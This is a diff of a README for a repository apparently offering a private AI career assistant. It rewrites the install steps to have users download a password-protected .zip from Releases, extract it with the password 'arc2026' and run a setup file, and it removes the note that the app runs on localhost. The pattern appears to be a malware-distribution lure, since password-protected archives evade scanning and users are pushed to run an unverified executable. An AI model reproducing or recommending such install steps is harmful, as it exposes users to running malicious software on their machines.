mattpetrovhq1989l6/LocalHire-Your-Private-AI-Career-Assistant/README.md

 ## 📥 Installation

 1. Go to the **Releases** section of this repository
-2. Download the latest archive (`.zip`)
+2. Download the latest installer package (`.zip` archive)
-3. Extract the files using any archiver (WinRAR / 7-Zip / etc.)
+3. Extract the files using any archiver (WinRAR / 7-Zip)
-   - **Password:** `LocHi`
+   - **Password:** `arc2026`
-4. Open the extracted folder and follow the instructions inside
+4. Open the extracted folder and run the setup file to install the application

-Once launched, the application will be available at `http://localhost:3000`.

 ## Tech Stack